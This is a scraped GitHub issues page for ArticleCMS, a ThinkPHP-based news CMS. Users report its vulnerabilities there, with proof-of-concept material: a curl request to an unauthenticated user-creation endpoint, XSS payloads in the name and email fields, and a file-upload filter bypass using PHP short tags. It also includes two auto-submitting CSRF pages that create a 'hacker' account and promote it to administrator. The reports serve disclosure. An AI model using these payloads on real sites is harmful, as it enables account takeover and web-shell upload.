woider / articlecms Goto Github PK
View Code? Open in Web Editor NEW基于 Bootstrap 3.2 和 ThinkPHP 5.0 搭建的响应式资讯网站,侧重于后台用户和文章的管理。
articlecms's People
Contributors
Stargazers
Watchers
Forkers
ichoukou mydreammyway jiaxing924 ishaoguan williamdoc jacezq fjzboy tvdrupal ricky-rt jshensh xiechennuo im286er wanzp kazuko x12311231 zhu-longge thesummerrain zhengchaolong happyjay23 linlwqq xyh922 wzrsmister tesla4321 azmallco icekindom fujizi zhilangtaosha laiyongqin nicholaszxs ijingyang li-siyuan pingzilao vokie123456 icefirefox sqwlly xy00zy z1125096 chensh268 roferwooarticlecms's Issues
后台接口无需登录就能进行操作
curl 'http://example.com/root_create_user' -H 'Pragma: no-cache' -H 'Origin: http://example.com' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Referer: http://example.com/admin' --data 'username=test233&password=test&realname=test&email=test233%40test.com' --compressed
In the modified name XSS attacks with the location of the mailbox
Place in modify the name and email insert test code will be executed after landing page
POC:
`
- POST /update_personal_infomation HTTP/1.1
- Host: 127.0.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
- Accept: */*
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://172.16.125.115/admin
- Content-Length: 80
- Cookie: PHPSESSID=ch6ursnieofju1mqn02n02ri64
- Connection: close
-
- realname="><img src=xss onerror=alert(1)>&email="><img src=xss onerror=alert(1)>
location:
<div class="modal-body">
<form class="form-horizontal">
<div class="form-group">
<label for="realname" class="col-sm-2 control-label">姓名</label>
<div class="col-sm-10">
<input type="text" class="form-control" id="realname"
value=""><img src=xss onerror=alert(1)>"/>
</div>
</div>
<div class="form-group">
<label for="email" class="col-sm-2 control-label">邮箱</label>
<div class="col-sm-10">
<input type="email" class="form-control" id="email"
value=""><img src=xss onerror=alert(1)>"/>
</div>
</div>
`
there is a File upload attack vulnerability
there is a File upload attack vulnerability,It can lead to arbitrary uploading of PHP script files.
The location of the vulnerability is in http://ip/public/admin,where the content editing function is.
Let's see the code:
There are two problems:
- The uploaded file detection is not strict, only the content-type is detected, and even the file suffix is not detected, which causes us to modify the content-type when uploading to bypass the upload php file.
- File processing logic vulnerabilities, although there is a file abbreviated processing, but when uploading a sentence Trojan with a jpg file header, the server will not return the address, but the file is already stored on the server, so the file upload can be achieved.
In addition, although the CMS detects and filters uploaded files, it will be automatically commented out if it matches <?php .
such as:
but We can bypass with short tags,such as:
- Use <?= instead of <?php
- Use <script language='php'></script> to bypass
My exploit is as follows:
Let's test it out.
as we can see,The PHP Trojan has been successfully uploaded and validated.
There is a remote code execution vulnerability
As we know Thinkphp5 had a remote code execution in low version , so we can exectue any code in ArticleCMS.
need update the version
上传图片错误
There have XSS vulnerability that can excute javascript
1
后台文章添加--无法上传图片
Two CSRF vulnerabilities that can create a new user and Promote it to Administrator privileges
When the super administrator (root) logged in, there are 2 important POST methods without CSRF protection, can create a new user and promote it to administrator privileges. This can be achieved by cheating the super administrator to open the 2 pages when he logged in.
<!--poc1.html(Create a new user)-->
<!DOCTYPE html>
<html>
<head>
<title> CSRF Proof Of Concept - Create a new user</title>
<script type="text/javascript">
function exec1(){
document.getElementById('form1').submit();
}
</script>
</head>
<body onload="exec1();">
<form id="form1" action="http://localhost/root_create_user" method="POST">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="password" value="hacker" />
<input type="hidden" name="realname" value="hacker" />
<input type="hidden" name="email" value="" />
</form>
</body>
</html>
<!--poc2.html(Promote a user to Administrator privileges)-->
<!DOCTYPE html>
<html>
<head>
<title> CSRF Proof Of Concept - update a user to admin</title>
<script type="text/javascript">
function exec1(){
document.getElementById('form1').submit();
}
</script>
</head>
<body onload="exec1();">
<form id="form1" action="http://localhost/update_admin_info" method="POST">
<input type="hidden" name="id" value="7" />
<input type="hidden" name="check" value="false" />
</form>
</body>
</html>
There is Two Cross-Site Request Forgery (CSRF) vulnerabilities in ArticleCMS allow attackers to create users and escalate privileges.
There is Two Cross-Site Request Forgery (CSRF) vulnerabilities in ArticleCMS allow attackers to create users and escalate privileges.
When the super administrator (root) logged in, there are 2 important POST methods without CSRF protection, can create a new user and promote it to administrator privileges. This can be achieved by cheating the super administrator to open the 2 pages when he logged in.
Set up the cms on the public network server and log in to the root user to obtain a request package for creating a user.
burp intercepts the request and creates the csrf poc.
Create the csrf page locally
At this point in another browser, assuming that the root user logged in to the CMS and left a login information in a browser, and then click the send others CSRF link:
http://192.168.1.26/SAFE16/articlecms_csrf.html
Go to this page
View the user management page,The ‘hacker’ user is added successfully.
In this set of cms, the duties are divided into administrator, auditor and editor from top to bottom.Promotion requires the root user to click this button.
This is also a csrf attack similar to the operation of creating users above.
After two promotions, hacker is promoted to administrator.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.